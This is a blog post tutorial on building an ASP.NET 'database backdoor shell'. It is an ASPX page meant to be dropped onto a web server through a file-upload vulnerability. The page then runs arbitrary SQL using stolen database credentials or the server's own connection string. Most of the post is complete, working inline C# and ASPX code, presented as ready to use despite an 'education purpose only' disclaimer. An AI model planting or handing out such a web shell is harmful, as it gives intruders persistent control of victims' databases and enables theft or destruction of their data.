Create ASP.NET Database Backdoor Shell

This post is not encouraging any king of Malicious activities. This is intended to education purpose only. Any one can use this code with their own risk. Developer is not responsible for any bad activities.

Assumption
———
1.ASP.Net application is having File Upload vulnerability.
2.We grabbed usename,password,dbname,servername of the Database or we can directly use Connection String from Web.config in this case no need to add those fields.

For using this technique we should find the File Upload vulnerability in Asp.net application.

If we want to create a DB Backdoor we should know the Database Server. Mostly ASP.NET will use MS SQLServer as Database. Some times it can be MySQL, SQLite or Oracle etc.

Developer should identify which Database server is used by Vulnerable web application.

Let’s get started.

1. Create a aspx page
First we need to create aspx page without code behind c# page. We are going to use inline asp.net code in the design page itself.

<%@ Page Language="C#" EnableViewState="false" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ASPX Shell</title>
</head>
<body>
<form id="form1" runat="server">
</form>
</body>
</html>

2. Add basic fields
After adding the empty aspx page we need to add input fields which need to be passed to connection string as well as query to be executed.

Server Name : <asp:TextBox ID="txtServer" runat="server"></asp:TextBox> 

User Name :   <asp:TextBox ID="txtUName" runat="server"></asp:TextBox> 

Passcode :    <asp:TextBox ID="txtPass" runat="server"></asp:TextBox> 

DB Name :     <asp:TextBox ID="txtDBName" runat="server"></asp:TextBox>

Query :  <asp:TextBox TextMode="MultiLine" ID="txtQuery" runat="server"></asp:TextBox>

<asp:Button ID="btnRun" runat="server" Text="Run Query"/> 

3. Add GridView to display the result
When you clicked on Run Query, Query need to be executed and display the result set. To display this result set we can use Gridview.

<asp:GridView ID="grdResult" runat="server"></asp:GridView>

4. Add assembly references
For Database communication we need to add assembly references try to add it by using import namespace tag.

<%@ Import Namespace="System.Web.UI.WebControls" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.Data.Odbc" %>
<%@ Import Namespace="System.Data.SqlClient" %>

5. Write Business logic
Start writing the business logic to execute the query. Validate all input fields before proceeding.

<%
try
{
if (!string.IsNullOrWhiteSpace(txtDBName.Text) && !string.IsNullOrWhiteSpace(txtServer.Text) && !string.IsNullOrWhiteSpace(txtUName.Text) && !string.IsNullOrWhiteSpace(txtPass.Text))
{
using (OdbcConnection connection = new OdbcConnection("DRIVER={MySQL ODBC 3.51 Driver};Database=" + txtDBName.Text + ";Server=" + txtServer.Text + ";UID=" + txtUName.Text + ";PWD=" + txtPass.Text + ";"))
{
connection.Open();
using (OdbcCommand command = new OdbcCommand(txtQuery.Text, connection))
using (OdbcDataReader dr = command.ExecuteReader())
{
grdResult.DataSource = dr;
grdResult.DataBind();
}
connection.Close();
}
}
}
catch (Exception ex)
{
Response.Write("An error occured: " + ex.Message);
}
%>

In this logic you can create any Database connection. The example here is MySQL connection.
If you want to add other connections you can modify the connection string part.

That’s it. You are ready to go.

Advertisements

About tvskumar2000

Tvs always cooooool
This entry was posted in ASP.Net, C#, Hacking and tagged , , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s